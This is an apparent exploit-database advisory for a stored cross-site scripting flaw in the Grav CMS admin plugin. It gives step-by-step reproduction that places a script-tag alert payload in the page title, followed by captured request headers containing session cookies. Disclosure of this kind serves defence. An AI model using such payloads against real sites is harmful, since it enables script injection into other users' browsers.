# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
# Date: 13-12-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage:
# Software Link:
# Version: Grav v1.6.30 - Admin v1.9.18
# Tested on: Windows 10/Kali Linux
# Contact:

Step to reproduce :

1) log in to the grav-admin panel 
2) Go to Pages 
3) Click on Add 
4) It will ask to Add Page
5) fill the following details as below 
   Page Title : <script>alert(1337)</script>
   Folder Name : sagar_Banwa
   Parent Page : /(root)
   Page Template : Default
   Value : yes
6) click on the Save button 
7) now Click on Pages again.
8) your page name will be listed as <script>alert(1337)</script>
9) Now click on the eye button to see the XSS or you can simply go to the XSS will pop-up 

POST /grav-admin/admin/pages HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 230
Connection: close
Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
Upgrade-Insecure-Requests: 1